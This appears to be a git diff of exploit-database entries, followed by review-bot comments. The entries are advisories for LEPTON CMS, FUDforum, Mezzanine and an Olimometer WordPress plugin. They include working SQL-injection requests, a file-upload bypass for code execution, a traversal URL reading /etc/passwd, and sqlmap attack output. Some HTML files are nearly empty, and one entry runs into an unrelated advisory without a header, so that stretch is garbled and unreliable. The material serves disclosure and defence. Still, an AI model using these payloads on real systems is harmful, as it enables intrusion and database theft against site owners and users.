+to access this feature. The injection is blind or error based in the case that +PHP is configured to show errors. 
+ +Proof of Concept: + +POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken= +dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language: +en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= +fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0 +Connection: close Content-Type: application/x-www-form-urlencoded +Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()& +visibility=public&submit=Add + +Blind or Error-based SQL Injection: Add Droplet + +CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P + +Description: The "Add_droplets" parameter of the droplet permission manager is +vulnerable to SQL injection. A user account with access to the Droplets +administration tool is required. The injection is blind or error based in the +case that PHP is configured to show errors. + +Proof of Concept: + +POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets& +leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost +Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: +PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid= +f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool= +droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute= +'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1& +Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1& +Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save + +4. Solution + +To mitigate this issue please upgrade at least to version 2.3.0: + +http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php + +Please note that a newer version might already be available. + +5. 
Report Timeline + +09/05/2016 Informed Vendor about Issue +09/06/2016 Vendor requests 60 days to release fix +10/25/2016 Vendor releases fix +11/10/2016 Disclosed to public + + +Blog Reference: +https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html + +-- +blog: https://www.curesec.com/blog +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Josef-Orlopp-Straße 54 +10365 Berlin, Germany \ No newline at end of file diff --git a/platforms/php/webapps/40801.txt b/platforms/php/webapps/40801.txt new file mode 100755 index 000000000..7fde98747 --- /dev/null +++ b/platforms/php/webapps/40801.txt 
@@ -0,0 +1,80 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: LEPTON 2.2.2 stable +Fixed in: 2.3.0 +Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php +Vendor Website: http://www.lepton-cms.org/ +Vulnerability Type: Code Execution +Remote Exploitable: Yes +Reported to vendor: 09/05/2016 +Disclosed to 11/10/2016 +public: +Release mode: Coordinated Release +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +Lepton is a content management system written in PHP. In version 2.2.2, it is +vulnerable to code execution as it is possible to upload files with dangerous +type via the media manager. + +3. Details + +Upload of file with dangerous type + +CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C + +Description: When uploading a file in the media tab, there is a client-side as +well as a server-side extension check. The server-side check can be bypassed by +including a valid extension before the desired extension, leading to code +execution or XSS. + +Proof of Concept: + +POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken= +099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language: +en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid= +8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data; +boundary=---------------------------38397165016927337851258279296 +Content-Length: 613 -----------------------------38397165016927337851258279296 +Content-Disposition: form-data; name="action" media_upload +-----------------------------38397165016927337851258279296 Content-Disposition: +form-data; name="current_dir" +-----------------------------38397165016927337851258279296 Content-Disposition: +form-data; name="upload[]"; filename="test.png.php5" Content-Type: image/png .jpg When the recipient views the PM, the injected code will +be executed. 
+ +XSS 2: Via Filename in Forum Posts + +CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N + +Description: The filename of attached images in forum posts is vulnerable to +persistent XSS. + +Proof of Concept: + +Create a new forum post. Add an attachment, where the filename is: '">.jpg When viewing the post the injected code will be +executed. + +XSS 3: Via Signature in User Profile + +CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N + +Description: When editing a profile, the signature is echoed unencoded, leading +to persistent XSS. + +Proof of Concept: + +Visit http://localhost/fudforum/index.php?t=register as signature, use '"> The injected code is either executed +when the user themselves edits their profile - which may be exploited via login +CSRF - or when an admin visits the edit profile page located here: http:// +localhost/fudforum/index.php?t=register&mod_id=6&&SQ= +1a85a858f326ec6602cb6d78d698f60a + +Login CSRF + +CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N + +Description: The login of FUDForum does not have any CSRF protection. The +impact of this is low, but an attacker might get a victim to disclose sensitive +information by using CSRF to log the victim into an attacker-controlled +account. An example would be the accidental sending of a sensitive private +message while being logged into an account controlled by an attacker. +Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the +user area. + +Proof of Concept: + +
+ +4. Solution + +This issue was not fixed by the vendor. + +5. Report Timeline + +04/11/2016 Informed Vendor about Issue (no reply) +09/14/2016 Reminded Vendor (no reply) +11/10/2016 Disclosed to public + + +Blog Reference: +https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html + +-- +blog: https://www.curesec.com/blog +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Josef-Orlopp-Straße 54 +10365 Berlin, Germany diff --git a/platforms/php/webapps/40803.txt b/platforms/php/webapps/40803.txt new file mode 100755 index 000000000..8f40648df --- /dev/null +++ b/platforms/php/webapps/40803.txt 
@@ -0,0 +1,58 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: FUDforum 3.0.6 +Fixed in: not fixed +Fixed Version Link: n/a +Vendor Website: http://fudforum.org/forum/ +Vulnerability Type: LFI +Remote Exploitable: Yes +Reported to vendor: 04/11/2016 +Disclosed to public: 11/10/2016 +Release mode: Full Disclosure +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable +to local file inclusion. This allows an attacker to read arbitrary files that +the web user has access to. + +Admin credentials are required. + +3. Details + +CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N + +Description: The "file" parameter of the hlplist.php script is vulnerable to +directory traversal, which allows the viewing of arbitrary files. + +Proof of Concept: + +http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ= +4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd + +4. Solution + +This issue was not fixed by the vendor. + +5. Report Timeline + +04/11/2016 Informed Vendor about Issue (no reply) +09/14/2016 Reminded Vendor (no reply) +11/10/2016 Disclosed to public + + +Blog Reference: +https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html + +-- +blog: https://www.curesec.com/blog +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Josef-Orlopp-Straße 54 +10365 Berlin, Germany \ No newline at end of file diff --git a/platforms/php/webapps/40804.txt b/platforms/php/webapps/40804.txt new file mode 100755 index 000000000..71455c46c --- /dev/null +++ b/platforms/php/webapps/40804.txt 
@@ -0,0 +1,126 @@ +# Exploit Title: Olimometer Plugin for WordPress – Sql Injection +# Date: 14/11/2016 +# Exploit Author: TAD GROUP +# Vendor Homepage: https://wordpress.org/plugins/olimometer/ +# Software Link: https://wordpress.org/plugins/olimometer/ +# Contact: info@tad.bg +# Website: http://tad.bg +# Category: Web Application Exploits +# Tested on: Debian 8 + + +1 - Description + +# Vulnerable parameter: olimometer_id= + +Parameter: olimometer_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: olimometer_id=1 AND 6227=6227 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: olimometer_id=1 AND SLEEP(5) + +Using GET SQL Method with the "olimometer_id" parameter, we were able to +get the database name from the EXAMPLE.COM website . By further running +SQL Map using different arguments, we would be able to get the complete +database, including usernames and passwords if there are such. + +2. Proof of Concept + +Using the website EXAMPLE.COM for example, we can fire up sqlmap and set +the full path to the vulnerable parameter: + +root@kali:~# sqlmap -u +http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_ +id=1 +--dbs --threads=5 --random-agent --no-cast + +--- +Parameter: olimometer_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: olimometer_id=1 AND 6227=6227 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: olimometer_id=1 AND SLEEP(5) +--- +[11:14:21] [INFO] the back-end DBMS is MySQL +web application technology: Nginx +back-end DBMS: MySQL >= 5.0.12 +[11:14:21] [INFO] fetching database names +[11:14:21] [INFO] fetching number of databases +[11:14:21] [INFO] retrieved: +[11:14:21] [WARNING] multi-threading is considered unsafe in time-based +data retrieval. 
Going to switch it off automatically +[11:14:21] [WARNING] (case) time-based comparison requires larger +statistical model, please wait.............................. (done) +[11:14:26] [WARNING] it is very important to not stress the network +adapter during usage of time-based payloads to prevent potential disruptions +[11:14:26] [ERROR] unable to retrieve the number of databases +[11:14:26] [INFO] falling back to current database +[11:14:26] [INFO] fetching current database +[11:14:26] [INFO] retrieving the length of query output +[11:14:26] [INFO] retrieved: +[11:14:28] [INFO] heuristics detected web page charset 'ascii' +14 +[11:15:26] [INFO] retrieved: *****_wrdp1 +available databases [1]: +[*] *****_wrdp1 + +We can see that we have successfully discovered one available database +with the name: "*****_wrdp1" + +3. Type of vulnerability: + +An SQL Injection vulnerability in Olimometer allows attackers to read +arbitrary data from the database. + +4. Exploitation vector: + +The url parameter 'olimometer_id=' of the +/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 is +vulnerable to SQLI. + +5. Attack outcome: + +An attacker can read arbitrary data from the database. If the webserver +is misconfigured, read & write access the filesystem may be possible. + +6. Impact: + +Critical + +7. Software/Product name: + +Olimometer Plugin for WordPress + +8. Affected versions: + +<= 2.56 + +9. Fixed in version: + +Not fixed at the date of submitting that exploit. + +10. Vendor: + +oshingler + +11. CVE number: + +Not existing + + +-- +Ivan Todorov | Иван Тодоров + +TAD GROUP | ТАД ГРУП +CEO | Изпълнителен Директор +www.tad.bg | +359 877 123456 +Самоков 28А, офис 6.2 | 1000 София | България +Samokov 28А, office 6.2 | 1000 Sofia | Bulgaria + + diff --git a/platforms/python/webapps/40799.txt b/platforms/python/webapps/40799.txt new file mode 100755 index 000000000..e29a7390f --- /dev/null +++ b/platforms/python/webapps/40799.txt 
@@ -0,0 +1,80 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: Mezzanine 4.2.0 +Fixed in: 4.2.1 +Fixed Version Link: https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1 +Vendor Website: http://mezzanine.jupo.org/ +Vulnerability Type: XSS +Remote Exploitable: Yes +Reported to vendor: 09/05/2016 +Disclosed to public: 11/10/2016 +Release mode: Coordinated Release +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +Mezzanine is an open source CMS written in python. In version 4.2.0, it is +vulnerable to two persistent XSS attacks, one of which requires extended +privileges, the other one does not. These issues allow an attacker to steal +cookies, inject JavaScript keyloggers, or bypass CSRF protection. + +3. Details + +XSS 1: Persistent XSS via Name in Comments + +CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N + +Description: When leaving a comment on a blog post, the author name is echoed +unencoded in the backend, leading to persistent XSS. + +Proof of Concept: + +Leave a comment, as author name use '"> To trigger +the payload, view the comment overview in the admin backend: http:// +localhost:8000/admin/generic/threadedcomment + +XSS 2: Persistent XSS via HTML file upload + +CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N + +Description: When uploading files via the media manager, the extension .html is +allowed, leading to XSS via file upload. An account with the permissions to +upload files to the media manager is required. + +Proof of Concept: + +Visit the media manager and upload a .html file: http://localhost:8000/admin/ +media-library/upload/?ot=desc&o=date As uploaded files are stored inside the +web root, it can now be accessed, thus executing the JavaScript code it +contains: http://localhost:8000/static/media/uploads/xss.html + +4. 
Solution + +To mitigate this issue please upgrade at least to version 4.2.1: + +https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1 + +Please note that a newer version might already be available. + +5. Report Timeline + +09/05/2016 Informed Vendor about Issue +09/05/2016 Vendor replies +09/19/2016 Vendor releases fix +11/10/2016 Disclosed to public + + +Blog Reference: +https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html + +-- +blog: https://www.curesec.com/blog +tweet: https://twitter.com/curesec + +Curesec GmbH +Curesec Research Team +Josef-Orlopp-Straße 54 +10365 Berlin, Germany \ No newline at end of file diff --git a/platforms/windows/dos/40793.html b/platforms/windows/dos/40793.html new file mode 100755 index 000000000..2d2b7bf55 --- /dev/null +++ b/platforms/windows/dos/40793.html @@ -0,0 +1,98 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40797.html b/platforms/windows/dos/40797.html new file mode 100755 index 000000000..061d40be6 --- /dev/null +++ b/platforms/windows/dos/40797.html @@ -0,0 +1,89 @@ + + + + + + A&#x­D;&#x­D;B + + + \ No newline at end of file diff --git a/platforms/windows/dos/40798.html b/platforms/windows/dos/40798.html new file mode 100755 index 000000000..b972b1ab7 --- /dev/null +++ b/platforms/windows/dos/40798.html @@ -0,0 +1,49 @@ + + + + + + + + \ No newline at end of file
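Review bot: the fixed version is inconsistent inside the Doxygen advisory: section 7 says "Update to AppFusions Doxygen for Atlassian Confluence v1.3.4" while the timeline entry for 11/07/2016 says "Vendor releases v1.3.1 which fixes the issue"; state which release actually contains the fix and whether 1.3.4 is merely the current release. The PoC request is also not a valid multipart body as written: the Content-Type header declares `boundary=---------------------------62841490314755966452122422550` but the closing delimiter is `-----------------------------98001232218371736091795669059--`. The root-cause description (`new File(System.getProperty("java.io.tmpdir") + File.separator + "doxygen-temp" + File.separator + tempId)` with no canonicalisation or containment check on `tempId`) would help readers verifying a patch more if it also said what the fixed version does differently.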
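Review bot: the payload in 40806.py is an undocumented hex blob; a comment saying what it is (the leading byte `\x16` marks an NTP mode 6 control message, and the ASCII inside reads `nonce, laddr=[]:`) and which function in ntpd it reaches would let readers and signature writers check it against CVE-2016-7434 instead of trusting the bytes. The usage message `print "usage: " + sys.argv[0] + " "` never names the two required arguments, and the Python 2 `print` statements under an unversioned `#!/usr/bin/env python` shebang are a SyntaxError where `python` resolves to Python 3; `#!/usr/bin/env python2` or `print(...)` with a `<host> <port>` hint fixes both. The file also ends without a trailing newline.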
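Review bot: the only substantive change to 895.c collapses the `shellcode[]` literal that was previously split across raw newlines, which is not valid C (a string literal cannot span lines without `\` continuation or adjacent-literal concatenation), so this makes the file compile again; that rationale belongs in the history rather than being implied. The second hunk only removes the file's trailing newline (`// milw0rm.com [2005-03-22]` followed by "No newline at end of file"), which is whitespace churn and should be dropped.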
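Review bot: the ARM branch of `exploit` in 40805.rb loops `while (not @elf_sent)` with no upper bound, so if the device never fetches the ELF the module POSTs to `/HNAP1/` forever; cap the attempts (the status message already promises "up to 15 minutes") and `fail_with` once the cap is reached. Other loose ends in the same hunk: `check` passes `'Content-Type' => 'text/xml'` as a top-level key to `send_request_cgi`, where it is not a recognised option, while `send_payload` correctly uses `'ctype'`; `filename = rand_text_alpha_lower(rand(8) + 2)` is assigned and never used, and the command built on the next line uses `/tmp/#(unknown)`, which is not Ruby interpolation, so that line needs attention; the MIPS comment `prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128` disagrees with the target constant `"\x23\xbd\xf3\xc8"` (0xf3c8 is the correct 16-bit encoding of -3128, so the comment is stale), and the layout comment's `'a' * (2064 - shellcode.size)` disagrees with the code's `target['Offset'] - payload.encoded.length` with `Offset` 3072. Given the header comments that stager and mettle payloads fail on ARM and that ASLR is defeated by many hundreds of retries, `ExcellentRanking` looks optimistic.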
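Review bot: no reason is recorded for deleting 40792.txt; the removed text still describes a reproducible issue (steps 1 and 2 against the admin log), so a one-line rationale (duplicate, retracted, reassigned id) would help anyone reading the history.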
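Review bot: the three PoC requests in 40800.txt are wrapped so that headers and body run together on one line (`Content-Length: 154 search_scope=title&terms=" union select`) and the `leptoken` and cookie values are split mid-value across lines, so none of them can be reproduced verbatim; put one header per line and the body after a blank line. The header block is also mis-wrapped: `Disclosed to 11/10/2016` / `public:` should read `Disclosed to public: 11/10/2016`, the `Fixed Version Link` URL is broken across two lines, and `Credits Tim Coen of Curesec GmbH` lacks the colon the other fields use.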
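Review bot: the 40801.txt hunk declares 80 added lines, but the visible text stops inside the LEPTON upload PoC (the `upload[]` part ends at `filename="test.png.php5" Content-Type: image/png`) and continues straight into FUDforum material (`XSS 2: Via Filename in Forum Posts`, `Login CSRF`, the blog link `FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html`) with no `diff --git` header for a second file; confirm the entry has not been truncated or merged with the FUDforum XSS advisory. In that FUDforum text the `Login CSRF` section's "Proof of Concept:" is followed immediately by "4. Solution" with no PoC, and the section lacks the product/version header block the other Curesec entries carry.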
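Review bot: 40803.txt is labelled `Vulnerability Type: LFI` and the overview says "local file inclusion", but the description and CVSS vector (`AV:N/AC:L/Au:S/C:P/I:N/A:N`) only claim that the `file` parameter of `hlplist.php` allows reading arbitrary files via `../` traversal; unless the script includes or executes the file, classify it as path traversal / arbitrary file read so the type matches the impact stated.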
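Review bot: the sqlmap invocation in 40804.txt is wrapped mid-parameter (`thermometer.php?olimometer_` / `id=1`) and across three lines, so it cannot be run as pasted; keep the command on one line. Section numbering is inconsistent (`1 - Description` then `2. Proof of Concept`), the title's `Sql Injection` should be `SQL Injection`, the sqlmap parameter summary is pasted twice (once under Description and again under the PoC), and "read & write access the filesystem" should read "read and write access to the filesystem". The trailing personal signature block (phone number and street address in two languages) is contact data that does not belong in the entry; the `# Contact:` header already covers it.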
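Review bot: both PoCs in 40799.txt are missing their payload: XSS 1 reads `as author name use '"> To trigger`, so the injected string itself is not in the entry; quote it in full (entity-encoded if the publishing pipeline strips tags), otherwise the PoC cannot be verified or turned into a test case. The XSS 2 URL is also broken across lines (`http:// localhost:8000/admin/ media-library/upload/`), and "written in python" should be "written in Python".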